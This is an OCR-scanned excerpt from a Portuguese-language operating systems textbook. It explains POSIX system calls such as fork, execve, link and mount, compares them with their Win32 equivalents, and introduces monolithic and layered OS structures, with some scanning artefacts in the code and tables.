Nas seções a seguir, examinaremos algumas das 
chamadas de sistema POSIX mais usadas, ou mais es- 
pecificamente, as rotinas de biblioteca que fazem uso 
dessas chamadas de sistema. POSIX tem cerca de 100 
chamadas de rotina. Algumas das mais importantes es- 
tão listadas na Figura 1.18, agrupadas por conveniência 
em quatro categorias. No texto, examinaremos breve- 
mente cada chamada para ver o que ela faz. 

Em grande medida, os serviços oferecidos por essas 
chamadas determinam a maior parte do que o sistema 
operacional tem de fazer, tendo em vista que o gerencia- 
mento de recursos em computadores pessoais é mínimo 
(pelo menos comparado a grandes máquinas com múl- 
tiplos usuários). Os serviços incluem coisas como criar 
e finalizar processos, criar, excluir, ler e escrever arqui- 
vos, gerenciar diretórios e realizar entradas e saídas. 

Como nota, vale a pena observar que o mapeamento 
de chamadas de rotina POSIX em chamadas de sistema 
não é de uma para uma. O padrão POSIX especifica uma 
série de procedimentos que um sistema em conformidade 
com esse padrão deve oferecer, mas ele não especifica 
se elas são chamadas de sistema, chamadas de bibliote- 
ca ou algo mais. Se uma rotina pode ser executada sem 
invocar uma chamada de sistema (isto é, sem um desvio 
para o núcleo), normalmente ela será realizada no espaço 
do usuário por questões de desempenho. No entanto, a 
maioria das rotinas POSIX invoca chamadas de sistema, 
em geral com uma rotina mapeando diretamente uma 
chamada de sistema. Em alguns casos — especialmente 
onde várias rotinas exigidas são apenas pequenas varia- 
ções umas das outras — uma chamada de sistema lida 
com mais de uma chamada de biblioteca. 
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1.6.1 Chamadas de sistema para gerenciamento 
de processos 


O primeiro grupo de chamadas na Figura 1.18 lida 
com o gerenciamento de processos. A chamada fork é 
um bom ponto para se começar a discussão. A chamada 
fork é a única maneira para se criar um processo novo 
em POSIX. Ela cria uma cópia exata do processo origi- 
nal, incluindo todos os descritores de arquivos, regis- 
tradores — tudo. Após a fork, o processo original e a 
cópia (o processo pai e o processo filho) seguem seus 
próprios caminhos separados. Todas as variáveis têm 
valores idênticos no momento da fork, mas como os da- 
dos do processo pai são copiados para criar o processo 
filho, mudanças subsequentes em um deles não afetam 
o outro. (O texto do programa, que é inalterável, é com- 
partilhado entre os processos pai e filho). A chamada 
fork retorna um valor, que é zero no processo filho e 
igual ao PID (Process IDentifier — identificador de 
processo) do processo filho no processo pai. Usando o 
PID retornado, os dois processos podem ver qual é o 
processo pai e qual é o filho. 

Na maioria dos casos, após uma fork, o processo fi- 
lho precisará executar um código diferente do processo 
pai. Considere o caso do shell. Ele lê um comando do 
terminal, cria um processo filho, espera que ele execu- 
te o comando e então lê o próximo comando quando 
o processo filho termina. Para esperar que o processo 
filho termine, o processo pai executa uma chamada de 
sistema waitpid, que apenas espera até o processo filho 
terminar (qualquer processo filho se mais de um exis- 
tir). Waitpid pode esperar por um processo filho especi- 
fico ou por qualquer filho mais velho configurando-se 
o primeiro parâmetro em —1. Quando waitpid termina, 
o endereço apontado pelo segundo parâmetro, statloc, 
será configurado como estado de saída do processo fi- 
lho (término normal ou anormal e valor de saída). Vá- 
rias opções também são fornecidas, especificadas pelo 
terceiro parâmetro. Por exemplo, retornar imediatamen- 
te se nenhum processo filho já tiver terminado. 

Agora considere como a fork é usada pelo shell. 
Quando um comando é digitado, o shell cria um novo 
processo. Esse processo filho tem de executar o coman- 
do de usuário. Ele o faz usando a chamada de sistema 
execve, que faz que toda a sua imagem de núcleo seja 
substituída pelo arquivo nomeado no seu primeiro pa- 
râmetro. (Na realidade, a chamada de sistema em si é 
exec, mas várias rotinas de biblioteca a chamam com 
parâmetros diferentes e nomes ligeiramente diferentes. 
Nós as trataremos aqui como chamadas de sistema.) 
Um shell altamente simplificado ilustrando o uso de 
fork, waitpid e execve é mostrado na Figura 1.19. 
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Algumas das principais chamadas de sistema POSIX. O código de retorno s é —1 se um erro tiver ocorrido. Os códigos 
de retorno são os seguintes: pid é um processo id, fd é um descritor de arquivo, n é um contador de bytes, position é um 
deslocamento no interior do arquivo e seconds é o tempo decorrido. Os parâmetros são explicados no texto. 

Gerenciamento de processos 


Chamada 


Descrição 





pid = fork( ) 


Cria um processo filho idéntico ao pai 





pid = waitpid(pid, &statloc, options) 


Espera que um processo filho seja concluido 





s = execve(name, argv, environp) 


exit(status) 





Substitui a imagem do núcleo de um processo 


Conclui a execução do processo e devolve status 





Gerenciamento de arquivos 





Chamada 


Descrição 





fd = open(file, how, ...) 


Abre um arquivo para leitura, escrita ou ambos 





s = close(fd) 


Fecha um arquivo aberto 





n = read(fd, buffer, nbytes) 


Lê dados a partir de um arquivo em um buffer 





n = write(fd, buffer, nbytes) 


Escreve dados a partir de um buffer em um arquivo 





position = Iseek(fd, offset, whence) 


s = stat(name, &buf) 


Move o ponteiro do arquivo 





Obtém informações sobre um arquivo 





Gerenciamento do sistema de diretório e arquivo 





Chamada 


Descrição 





s = mkdir(name, mode) 


Cria um novo diretório 





s = rmdir(name) 


Remove um diretório vazio 





s = link(name1, name2) 


Cria uma nova entrada, name2, apontando para name1 





s = unlink(name) 


Remove uma entrada de diretório 





s = mount(special, name, flag) 


s = umount(special) 


Monta um sistema de arquivos 





Desmonta um sistema de arquivos 





Diversas 





Chamada 


Descrição 





s = chdir(dirname) 


Altera o diretório de trabalho 





s = chmod(name, mode) 


Altera os bits de proteção de um arquivo 





s = kill(pid, signal) 


Envia um sinal para um processo 





seconds = time(&seconds) 








Obtém o tempo decorrido desde 1° de janeiro de 1970 





(FIGURA 1.19 | Um interpretador de comandos simplificado. Neste livro, 


#define TRUE 1 


while (TRUE) { 
type_prompt ); 


read_command(command, parameters); 


if (fork() != 0) { 
/* Codigo do processo pai. */ 
waitpid(—1, &status, 0); 

yelse { 
/* Codigo do processo filho. */ 
execve(command, parameters, 0); 





presume-se que TRUE seja definido como 1.* 


/* repita para sempre */ 

/* mostra prompt na tela */ 
/* le entrada do terminal */ 
/* cria processo filho */ 


/* aguarda o processo filho acabar */ 


/* executa o comando */ 


A linguagem C não permite o uso de caracteres com acentos, por isso os comentários neste e em outros códigos C estão sem acentuação. (N.R.T.) 


No caso mais geral, execve possui três parâmetros: 
o nome do arquivo a ser executado, um ponteiro para 
o arranjo de argumentos e um ponteiro para o arran- 
jo de ambiente. Esses parâmetros serão descritos bre- 
vemente. Várias rotinas de biblioteca, incluindo execl, 
execy, execle e execve, são fornecidas para permitir que 
os parâmetros sejam omitidos ou especificados de vá- 
rias maneiras. Neste livro, usaremos o nome exec para 
representar a chamada de sistema invocada por todas 
essas rotinas. 

Vamos considerar o caso de um comando como 


cp fd1 fd2 


usado para copiar o fd/ para o fd2. Após o shell ter cria- 
do o processo filho, este localiza e executa o arquivo cp 
e passa para ele os nomes dos arquivos de origem e de 
destino. 

O programa principal de cp (e programa principal da 
maioria dos outros programas C) contém a declaração 


main(argc, argv, envp) 


onde argc é uma contagem do número de itens na li- 
nha de comando, incluindo o nome do programa. Para o 
exemplo, argc é 3. 

O segundo parâmetro, argv, é um ponteiro para um 
arranjo. O elemento i do arranjo é um ponteiro para a 
i-ésima cadeia de caracteres na linha de comando. Em 
nosso exemplo, argv[0] apontaria para a cadeia de ca- 
racteres “cp”, argv[1] apontaria para a “fdl” e argv[2] 
apontaria para a “fd2”. 

O terceiro parâmetro do main, envp, é um ponteiro 
para o ambiente, um arranjo de cadeias de caracteres 
contendo atribuições da forma nome = valor usadas 
para passar informações como o tipo de terminal e o 
nome do diretório home para programas. Há rotinas de 
biblioteca que os programas podem chamar para conse- 
guir as variáveis de ambiente, as quais são muitas vezes 
usadas para personalizar como um usuário quer desem- 
penhar determinadas tarefas (por exemplo, a impressora 
padrão a ser utilizada). Na Figura 1.19, nenhum am- 
biente é passado para o processo filho, então o terceiro 
parâmetro de execve é um zero. 

Se exec parece complicado, não se desespere; ela é 
(semanticamente) a mais complexa de todas as chama- 
das de sistema POSIX. Todas as outras são muito mais 
simples. Como um exemplo de uma chamada simples, 
considere exit, que os processos devem usar para ter- 
minar a sua execução. Ela tem um parâmetro, o estado 
da saída (0 a 255), que é retornado ao processo pai via 
statloc na chamada de sistema waitpid. 
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Processos em UNIX tém sua memoria dividida em 
três segmentos: o segmento de texto (isto é, código de 
programa), o segmento de dados (isto é, as variáveis) 
e o segmento de pilha. O segmento de dados cresce 
para cima e a pilha cresce para baixo, como mostrado 
na Figura 1.20. Entre eles há uma lacuna de espaço de 
endereço não utilizado. A pilha cresce na lacuna auto- 
maticamente, na medida do necessário, mas a expansão 
do segmento de dados é feita explicitamente pelo uso 
de uma chamada de sistema, brk, que especifica o novo 
endereço onde o segmento de dados deve terminar. Essa 
chamada, no entanto, não é definida pelo padrão PO- 
SIX, tendo em vista que os programadores são enco- 
rajados a usar a rotina de biblioteca malloc para alocar 
dinamicamente memória, e a implementação subjacente 
de malloc não foi vista como um assunto adequado para 
padronização, pois poucos programadores a usam dire- 
tamente e é questionável se alguém mesmo percebe que 
brk não está no POSIX. 


(elt TE Os processos têm três segmentos: texto, dados e 
pilha. 


Endereço (hex) 
FFFF 





0000 


1.6.2 Chamadas de sistema para gerenciamento 
de arquivos 


Muitas chamadas de sistema relacionam-se ao siste- 
ma de arquivos. Nesta seção examinaremos as chama- 
das que operam sobre arquivos individuais; na próxima, 
examinaremos as que envolvem diretórios ou o sistema 
de arquivos como um todo. 

Para ler ou escrever um arquivo, é preciso primeiro 
abri-lo. Essa chamada especifica o nome do arquivo a 
ser aberto, seja como um nome de caminho absoluto ou 
relativo ao diretório de trabalho, assim como um código 
de O_RDONLY, O_WRONLY, ou O_RDWR, significan- 
do aberto para leitura, escrita ou ambos. Para criar um 
novo arquivo, o parâmetro O_CREAT é usado. 

O descritor de arquivos retornado pode então ser 
usado para leitura ou escrita. Em seguida, o arquivo 
pode ser fechado por close, que torna o descritor dis- 
ponível para ser reutilizado em um open subsequente. 
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As chamadas mais intensamente usadas são, sem dú- 
vida, read e write. Já vimos read. Write tem os mesmos 
parâmetros. 

Embora a maioria dos programas leia e escreva ar- 
quivos sequencialmente, alguns programas de aplica- 
tivos precisam ser capazes de acessar qualquer parte 
de um arquivo de modo aleatório. Associado a cada 
arquivo há um ponteiro que indica a posição atual no 
arquivo. Quando lendo (escrevendo) sequencialmente, 
ele em geral aponta para o próximo byte a ser lido (es- 
crito). A chamada Iseek muda o valor do ponteiro de 
posição, de maneira que chamadas subsequentes para 
ler ou escrever podem começar em qualquer parte no 
arquivo. 

Lseek tem três parâmetros: o primeiro é o descritor 
de arquivo para o arquivo, o segundo é uma posição do 
arquivo e o terceiro diz se a posição do arquivo é relati- 
va ao começo, à posição atual ou ao fim do arquivo. O 
valor retornado por Iseek é a posição absoluta no arqui- 
vo (em bytes) após mudar o ponteiro. 

Para cada arquivo, UNIX registra o tipo do arquivo 
(regular, especial, diretório, e assim por diante), tama- 
nho, hora da última modificação e outras informações. 
Os programas podem pedir para ver essas informações 
através de uma chamada de sistema stat. O primeiro 
parâmetro especifica o arquivo a ser inspecionado; o 
segundo é um ponteiro para uma estrutura na qual a in- 
formação deverá ser colocada. As chamadas fstat fazem 
a mesma coisa para um arquivo aberto. 


1.6.3 Chamadas de sistema para gerenciamento 
de diretórios 


Nesta seção examinaremos algumas chamadas de 
sistema que se relacionam mais aos diretórios ou o sis- 
tema de arquivos como um todo, em vez de apenas um 
arquivo específico como na seção anterior. As primeiras 
duas chamadas, mkdir e rmdir, criam e removem diretó- 
rios vazios, respectivamente. A próxima chamada é link. 
Sua finalidade é permitir que o mesmo arquivo apare- 
ça sob dois ou mais nomes, muitas vezes em diretórios 


diferentes. Um uso típico é permitir que vários mem- 
bros da mesma equipe de programação compartilhem 
um arquivo comum, com cada um deles tendo o arqui- 
vo aparecendo no seu próprio diretório, possivelmente 
sob nomes diferentes. Compartilhar um arquivo não é 
o mesmo que dar a cada membro da equipe uma cópia 
particular; ter um arquivo compartilhado significa que 
as mudanças feitas por qualquer membro da equipe são 
instantaneamente visíveis para os outros membros, mas 
há apenas um arquivo. Quando cópias de um arquivo 
são feitas, mudanças subsequentes feitas para uma có- 
pia não afetam as outras. 

Para vermos como link funciona, considere a situa- 
ção da Figura 1.21(a). Aqui há dois usuários, ast e jim, 
cada um com o seu próprio diretório com alguns arqui- 
vos. Se ast agora executa um programa contendo a cha- 
mada de sistema 


link(“/usr/jim/memo”, “/usr/ast/note”); 


o arquivo memo no diretório de jim estará aparecendo 
agora no diretório de ast sob o nome note. Daí em dian- 
te, /usr/jim/memo e /usr/ast/note referem-se ao mesmo 
arquivo. Como uma nota, se os diretórios serão man- 
tidos em /usr, /user, /home, ou em outro lugar é ape- 
nas uma decisão tomada pelo administrador do sistema 
local. 

Compreender como link funciona provavelmente 
tornará mais claro o que ele faz. Todo arquivo UNIX 
tem um número único, o seu i-número, que o identifica. 
Esse i-número é um índice em uma tabela de i-nós, um 
por arquivo, dizendo quem possui o arquivo, onde seus 
blocos de disco estão e assim por diante. Um diretório 
é apenas um arquivo contendo um conjunto de pares 
(i-número, nome em ASCII). Nas primeiras versões do 
UNIX, cada entrada de diretório tinha 16 bytes — 2 
bytes para o i-número e 14 bytes para o nome. Ago- 
ra, uma estrutura mais complicada é necessária para 
dar suporte a nomes longos de arquivos, porém concei- 
tualmente, um diretório ainda é um conjunto de pares 
(i-número, nome em ASCII). Na Figura 1.21, mail tem 
o i-numero 16 e assim por diante. O que link faz é nada 
mais que criar uma entrada de diretório nova com um 


alleles RAS (a) Dois diretórios antes da ligação de /usr/jim/memo ao diretório ast. (0) Os mesmos diretórios depois dessa ligação. 





lusr/ast /usr/jim 
16 | correio 31 | bin 
81 | jogos 70 | memo 
40 | teste 59 | f.c. 


38 | prog1 


(a) 





lusr/ast /usr/jim 
16 | correio 31 | bin 
81 | jogos 70 | memo 
40 | teste 59 | f.c. 
70 | nota 38 | prog1 


(b) 


nome (possivelmente novo), usando o i-número de um 
arquivo existente. Na Figura 1.21(b), duas entradas têm 
o mesmo i-número (70) e desse modo, referem-se ao 
mesmo arquivo. Se qualquer uma delas for removida 
mais tarde, usando a chamada de sistema unlink, a outra 
permanece. Se ambas são removidas, UNIX vê que não 
existem entradas para o arquivo (um campo no i-nó re- 
gistra o número de entradas de diretório apontando para 
o arquivo), assim o arquivo é removido do disco. 

Como mencionamos antes, a chamada de sistema 
mount permite que dois sistemas de arquivos sejam 
fundidos em um. Uma situação comum é ter o sistema 
de arquivos-raiz, contendo as versões (executáveis) bi- 
nárias dos comandos comuns e outros arquivos inten- 
samente usados, em uma (sub)partição de disco rígido 
e os arquivos do usuário em outra (sub)partição. Poste- 
riormente o usuário pode ainda inserir um disco USB 
com arquivos para serem lidos. 

Ao executar a chamada de sistema mount, o sistema 
de arquivos USB pode ser anexado ao sistema de arqui- 
vos-raiz, como mostrado na Figura 1.22. Um comando 
típico em C para realizar essa montagem é 


mount(“/dev/sdb0”, “/mnt”, 0); 


onde o primeiro parâmetro é o nome de um arquivo es- 
pecial de blocos para a unidade de disco 0, o segundo é 
o lugar na árvore onde ele deve ser montado, e o tercei- 
ro diz se o sistema de arquivos deve ser montado como 
leitura e escrita ou somente leitura. 

Após a chamada mount, um arquivo na unidade de 
disco 0 pode ser acessado usando o seu caminho do 
diretório-raiz ou do diretório de trabalho, sem levar em 
consideração em qual unidade de disco ele está. Na re- 
alidade, a segunda, terceira e quarta unidades de disco 
também podem ser montadas em qualquer parte na ár- 
vore. A chamada mount torna possível integrar meios 
removíveis em uma única hierarquia de arquivos inte- 
grada, sem precisar preocupar-se em qual dispositivo 
se encontra um arquivo. Embora esse exemplo envol- 
va CD-ROMs, porções de discos rígidos (muitas vezes 
chamadas partições ou dispositivos secundários) tam- 
bém podem ser montadas dessa maneira, assim como 
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discos rígidos externos e pen drives USB. Quando um 
sistema de arquivos não é mais necessário, ele pode ser 
desmontado com a chamada de sistema umount. 


1.6.4 Chamadas de sistema diversas 


Existe também uma variedade de outras chamadas 
de sistema. Examinaremos apenas quatro delas aqui. A 
chamada chdir muda o diretório de trabalho atual. Após 
a chamada 


chdir(“/usr/ast/test’); 


uma abertura no arquivo xyz abrira /usr/ast/test/xyz. O 
conceito de um diretório de trabalho elimina a necessi- 
dade de digitar (longos) nomes de caminhos absolutos 
a toda hora. 

Em UNIX todo arquivo tem um modo usado para 
proteção. O modo inclui os bits de leitura-escrita-exe- 
cução para o proprietário, para o grupo e para os outros. 
A chamada de sistema chmod torna possível mudar o 
modo de um arquivo. Por exemplo, para tornar um ar- 
quivo como somente de leitura para todos, exceto o pro- 
prietário, poderia ser executado 


chmod(file”, 0644): 


A chamada de sistema kill é a maneira pela qual os 
usuários e os processos de usuários enviam sinais. Se 
um processo está preparado para capturar um sinal em 
particular, então, quando ele chega, uma rotina de tra- 
tamento desse sinal é executada. Se o processo não está 
preparado para lidar com um sinal, então sua chegada 
mata o processo (daí seu nome). 

O POSIX define uma série de rotinas para lidar 
com o tempo. Por exemplo, time retorna o tempo atu- 
al somente em segundos, com 0 correspondendo a 1º 
de janeiro, 1970, à meia-noite (bem como se o dia esti- 
vesse começando, não terminando). Em computadores 
usando palavras de 32 bits, o valor máximo que time 
pode retornar é 2%? — 1 s (presumindo que um inteiro 
sem sinal esteja sendo usado). Esse valor corresponde a 
um pouco mais de 136 anos. Desse modo, no ano 2106, 
sistemas UNIX de 32 bits entrarão em pane, de maneira 
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semelhante ao famoso problema Y2K que causaria um 
estrago enorme com os computadores do mundo em 
2000, não fosse o esforço enorme realizado pela indús- 
tria de TI para resolver o problema. Se hoje você possui 
um sistema UNIX de 32 bits, aconselhamos que você o 
troque por um de 64 bits em algum momento antes do 
ano de 2106. 


1.6.5 A API Win32 do Windows 


Até aqui nos concentramos fundamentalmente no 
UNIX. Agora chegou o momento para examinarmos 
com brevidade o Windows. O Windows e o UNIX dife- 
rem de uma maneira fundamental em seus respectivos 
modelos de programação. Um programa UNIX consis- 
te de um código que faz uma coisa ou outra, fazendo 
chamadas de sistema para ter determinados serviços 
realizados. Em comparação, um programa Windows 
é normalmente direcionado por eventos. O programa 
principal espera por algum evento acontecer, então cha- 
ma uma rotina para lidar com ele. Eventos típicos são 
teclas sendo pressionadas, o mouse sendo movido, um 
botão do mouse acionado, ou um disco flexível inserido. 
Tratadores são então chamados para processar o evento, 
atualizar a tela e o estado do programa interno. Como 
um todo, isso leva a um estilo de certa maneira diferente 
de programação do que com o UNIX, mas tendo em 
vista que o foco deste livro está na função e estrutura 
do sistema operacional, esses modelos de programação 
diferentes não nos dizem mais respeito. 

É claro, o Windows também tem chamadas de sis- 
tema. Com o UNIX, há quase uma relação de um para 
um entre as chamadas de sistema (por exemplo, read) e 
as rotinas de biblioteca (por exemplo, read) usadas para 
invocar as chamadas de sistema. Em outras palavras, 
para cada chamada de sistema, há aproximadamente 
uma rotina de biblioteca que é chamada para invocá-la, 
como indicado na Figura 1.17. Além disso, POSIX tem 
apenas em torno de 100 chamadas de rotina. 

Com o Windows, a situação é radicalmente diferen- 
te. Para começo de conversa, as chamadas de biblioteca 
e as chamadas de sistema reais são altamente desaco- 
pladas. A Microsoft definiu um conjunto de rotinas 
chamadas de API Win32 (Application Programming 
Interface — interface de programação de aplicativos) 
que se espera que os programadores usem para acessar 
os serviços do sistema operacional. Essa interface tem 
contado com o suporte (parcial) de todas as versões do 
Windows desde o Windows 95. Ao desacoplar a inter- 
face API das chamadas de sistema reais, a Microsoft 
retém a capacidade de mudar as chamadas de sistema 


reais a qualquer tempo (mesmo de um lançamento para 
outro) sem invalidar os programas existentes. O que de 
fato constitui o Win32 também é um tanto ambíguo, 
pois versões recentes do Windows têm muitas chama- 
das novas que não estavam disponíveis anteriormente. 
Nesta seção, Win32 significa a interface que conta com 
o suporte de todas as versões do Windows. A Win32 pro- 
porciona compatibilidade entre as versões do Windows. 

O número de chamadas API Win32 é extremamen- 
te grande, chegando a milhares. Além disso, enquanto 
muitas delas invocam chamadas de sistema, um número 
substancial é executado inteiramente no espaço do usu- 
ário. Como consequência, com o Windows é impossível 
de se ver o que é uma chamada de sistema (isto é, reali- 
zada pelo núcleo) e o que é apenas uma chamada de bi- 
blioteca do espaço do usuário. Na realidade, o que é uma 
chamada de sistema em uma versão do Windows pode 
ser feito no espaço do usuário em uma versão diferente, 
e vice-versa. Quando discutirmos as chamadas de siste- 
ma do Windows neste livro, usaremos as rotinas Win32 
(quando for apropriado), já que a Microsoft garante que 
essas rotinas seguirão estáveis com o tempo. Mas vale a 
pena lembrar que nem todas elas são verdadeiras chama- 
das de sistema (isto é, levam o controle para o núcleo). 

A API Win32 tem um número enorme de chamadas 
para gerenciar janelas, figuras geométricas, texto, fon- 
tes, barras de rolagem, caixas de diálogo, menus e ou- 
tros aspectos da interface gráfica GUI. Na medida em 
que o subsistema gráfico é executado no núcleo (uma 
verdade em algumas versões do Windows, mas não to- 
das), elas são chamadas de sistema; do contrário, são 
apenas chamadas de biblioteca. Deveriamos discutir es- 
sas chamadas neste livro ou não? Tendo em vista que 
elas não são realmente relacionadas à função do siste- 
ma operacional, decidimos que não, embora elas pos- 
sam ser executadas pelo núcleo. Leitores interessados 
na API Win32 devem consultar um dos muitos livros 
sobre o assunto (por exemplo, HART, 1997; RECTOR 
e NEWCOMER, 1997; e SIMON, 1997). 

Mesmo introduzir todas as chamadas API Win32 
aqui está fora de questão, então vamos nos restringir 
aquelas chamadas que correspondem mais ou menos à 
funcionalidade das chamadas UNIX listadas na Figura 
1.18. Estas estão listadas na Figura 1.23. 

Vamos agora repassar brevemente a lista da Figura 
1.23. CreateProcess cria um novo processo, realizando 
o trabalho combinado de fork e execve em UNIX. Pos- 
sui muitos parâmetros especificando as propriedades do 
processo recentemente criado. O Windows não tem uma 
hierarquia de processo como o UNIX, então não há um 
conceito de um processo pai e um processo filho. Após 


um processo ser criado, o criador e criatura são iguais. 
WaitForSingleObject é usado para esperar por um even- 
to. É possível se esperar por muitos eventos com essa 
chamada. Se o parâmetro especifica um processo, então 
quem chamou espera pelo processo especificado termi- 
nar, o que é feito usando ExitProcess. 

As próximas seis chamadas operam em arquivos e 
são funcionalmente similares a suas correspondentes do 
UNIX, embora difiram nos parâmetros e detalhes. Ainda 
assim, os arquivos podem ser abertos, fechados, lidos e 
escritos de uma maneira bastante semelhante ao UNIX. 
As chamadas SetFilePointer e GetFileAttributesEx esta- 
belecem a posição do arquivo e obtêm alguns de seus 
atributos. 

O Windows tem diretórios e eles são criados com 
chamadas API CreateDirectory e RemoveDirectory, res- 
pectivamente. Há também uma noção de diretório atual, 
determinada por SetCurrentDirectory. A hora atual do 
dia é conseguida usando GetLocalTime. 

A interface Win32 não tem links para os arquivos, 
tampouco sistemas de arquivos montados, segurança 
ou sinais, de maneira que não existem as chamadas cor- 
respondentes ao UNIX. É claro, Win32 tem um número 
enorme de outras chamadas que o UNIX não tem, em 
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especial para gerenciar a interface gráfica GUI. O Win- 
dows Vista tem um sistema de segurança elaborado e 
também dá suporte a links de arquivos. Os Windows 7 e 8 
acrescentam ainda mais aspectos e chamadas de sistema. 
Uma última nota a respeito do Win32 talvez valha a 
pena ser feita. O Win32 não é uma interface realmente 
uniforme ou consistente. A principal culpada aqui foi a 
necessidade de ser retroativamente compatível com a 
interface anterior de 16 bits usada no Windows 3.x. 


1.7 Estrutura de sistemas operacionais 


Agora que vimos como os sistemas operacionais pa- 
recem por fora (isto é, a interface do programador), é 
hora de darmos uma olhada por dentro. Nas seções a se- 
guir, examinaremos seis estruturas diferentes que foram 
tentadas, a fim de termos alguma ideia do espectro de 
possibilidades. Isso não quer dizer que esgotaremos o 
assunto, mas elas dão uma ideia de alguns projetos que 
foram tentados na prática. Os seis projetos que discuti- 
remos aqui são sistemas monolíticos, sistemas de cama- 
das, micronúcleos, sistemas cliente-servidor, máquinas 
virtuais e exonúcleos. 


le TG RES As chamadas da API Win32 que correspondem aproximadamente às chamadas UNIX da Figura 1.18. Vale a pena enfatizar que 
o Windows tem um número muito grande de outras chamadas de sistema, a maioria das quais não corresponde a nada no UNIX. 




































































UNIX Win32 Descrição 
fork CreateProcess Cria um novo processo 
waitpid | WaitForSingleObject Pode esperar que um processo termine 
execve | (nenhuma) CreateProcess = fork + execve 
exit ExitProcess Conclui a execução 
open CreateFile Cria um arquivo ou abre um arquivo existente 
close CloseHandle Fecha um arquivo 
read ReadFile Lé dados a partir de um arquivo 
write WriteFile Escreve dados em um arquivo 
Iseek SetFilePointer Move o ponteiro do arquivo 
stat GetFileAttributesEx Obtém vários atributos do arquivo 
mkdir CreateDirectory Cria um novo diretório 
rmdir RemoveDirectory Remove um diretório vazio 
link (nenhuma) Win32 não da suporte a ligações 
unlink DeleteFile Destrói um arquivo existente 
mount (nenhuma) Win32 não dá suporte a mount 
umount | (nenhuma) Win32 não dá suporte a mount 
chdir SetCurrentDirectory Altera o diretório de trabalho atual 
chmod (nenhuma) Win32 não dá suporte a segurança (embora o NT suporte) 
kill (nenhuma) Win32 não dá suporte a sinais 
time GetLocalTime Obtém o tempo atual 
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1.7.1 Sistemas monolíticos 


De longe a organização mais comum, na aborda- 
gem monolítica todo o sistema operacional é executado 
como um único programa em modo núcleo. O sistema 
operacional é escrito como uma coleção de rotinas, li- 
gadas a um único grande programa binário executável. 
Quando a técnica é usada, cada procedimento no siste- 
ma é livre para chamar qualquer outro, se este oferecer 
alguma computação útil de que o primeiro precisa. Ser 
capaz de chamar qualquer procedimento que você quer 
é muito eficiente, mas ter milhares de procedimentos 
que podem chamar um ao outro sem restrições pode 
também levar a um sistema difícil de lidar e compre- 
ender. Também, uma quebra em qualquer uma dessas 
rotinas derrubará todo o sistema operacional. 

Para construir o programa objeto real do sistema 
operacional quando essa abordagem é usada, é preci- 
so primeiro compilar todas as rotinas individuais (ou os 
arquivos contendo as rotinas) e então juntá-las em um 
único arquivo executável usando o ligador (linker) do 
sistema. Em termos de ocultação de informações, es- 
sencialmente não há nenhuma — toda rotina é visível 
para toda outra rotina (em oposição a uma estrutura 
contendo módulos ou pacotes, na qual grande parte da 
informação é escondida dentro de módulos, e apenas os 
pontos de entrada oficialmente designados podem ser 
chamados de fora do módulo). 

Mesmo em sistemas monolíticos, no entanto, é pos- 
sível se ter alguma estrutura. Os serviços (chamadas de 
sistema) providos pelo sistema operacional são requi- 
sitados colocando-se os parâmetros em um local bem 
definido (por exemplo, em uma pilha) e então execu- 
tando uma instrução de desvio de controle (trap). Essa 
instrução chaveia a máquina do modo usuário para o 
modo núcleo e transfere o controle para o sistema ope- 
racional, mostrado no passo 6 na Figura 1.17. O sistema 


operacional então busca os parâmetros e determina qual 
chamada de sistema será executada. Depois disso, ele 
indexa uma tabela que contém na linha k um ponteiro 
para a rotina que executa a chamada de sistema k (passo 
7 na Figura 1.17). 

Essa organização sugere uma estrutura básica para o 
sistema operacional: 


1. Um programa principal que invoca a rotina de 
serviço requisitada. 

2. Um conjunto de rotinas de serviço que executam 
as chamadas de sistema. 

3. Um conjunto de rotinas utilitárias que ajudam as 
rotinas de serviço. 


Nesse modelo, para cada chamada de sistema há 
uma rotina de serviço que se encarrega dela e a executa. 
As rotinas utilitárias fazem coisas que são necessárias 
para várias rotinas de serviços, como buscar dados de 
programas dos usuários. Essa divisão em três camadas 
é mostrada na Figura 1.24. 

Além do sistema operacional principal que é carre- 
gado quando o computador é inicializado, muitos siste- 
mas operacionais dão suporte a extensões carregáveis, 
como drivers de dispositivos de E/S e sistemas de ar- 
quivos. Esses componentes são carregados conforme a 
demanda. No UNIX eles são chamados de bibliotecas 
compartilhadas. No Windows são chamados de DLLs 
(Dynamic Link Libraries — bibliotecas de ligação di- 
nâmica). Eles têm a extensão de arquivo .dil e o dire- 
tório CiWindowslsystem32 nos sistemas Windows tem 
mais de 1.000 deles. 


1.7.2 Sistemas de camadas 


Uma generalização da abordagem da Figura 1.24 é or- 
ganizar o sistema operacional como uma hierarquia de ca- 
madas, cada uma construída sobre a camada abaixo dela. 


(cj PLS Um modelo de estruturação simples para um sistema monolítico. 
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O primeiro sistema construído dessa maneira foi o sistema 
THE desenvolvido na Technische Hogeschool Eindhoven 
na Holanda por E. W. Dijkstra (1968) e seus estudantes. 
O sistema THE era um sistema em lote simples para um 
computador holandês, o Electrologica X8, que tinha 32 K 
de palavras de 27 bits (bits eram caros na época). 

O sistema tinha seis camadas, com mostrado na Fi- 
gura 1.25. A camada 0 lidava com a alocação do proces- 
sador, realizando o chaveamento de processos quando 
ocorriam interrupções ou quando os temporizadores 
expiravam. Acima da camada 0, o sistema consistia em 
processos sequenciais e cada um deles podia ser pro- 
gramado sem precisar preocupar-se com o fato de que 
múltiplos processos estavam sendo executados em um 
único processador. Em outras palavras, a camada 0 for- 
necia a multiprogramação básica da CPU. 

A camada 1 realizava o gerenciamento de memória. 
Ela alocava espaço para processos na memória princi- 
pal e em um tambor magnético de 512 K palavras usado 
para armazenar partes de processos (páginas) para as 
quais não havia espaço na memória principal. Acima da 
camada 1, os processos não precisavam se preocupar se 
eles estavam na memória ou no tambor magnético; o 
software da camada 1 certificava-se de que as páginas 
fossem trazidas à memória no momento em que eram 
necessárias e removidas quando não eram mais. 

A camada 2 encarregava-se da comunicação entre 
cada processo e o console de operação (isto é, o usuá- 
rio). Acima dessa camada cada processo efetivamente 
tinha o seu próprio console de operação. A camada 3 en- 
carregava-se do gerenciamento dos dispositivos de E/S 
e armazenava temporariamente os fluxos de informação 
que iam ou vinham desses dispositivos. Acima da ca- 
mada 3, cada processo podia lidar com dispositivos de 
E/S abstratos mais acessíveis, em vez de dispositivos 
reais com muitas peculiaridades. A camada 4 era onde 
os programas dos usuários eram encontrados. Eles não 
precisavam se preocupar com o gerenciamento de pro- 
cesso, memória, console ou E/S. O processo operador 
do sistema estava localizado na camada 5. 


(CUSTAR Ro Estrutura do sistema operacional THE. 
































Camada Função 
5 O operador 
4 Programas de usuário 
3 Gerenciamento de entrada/saída 
2 Comunicação operador-processo 
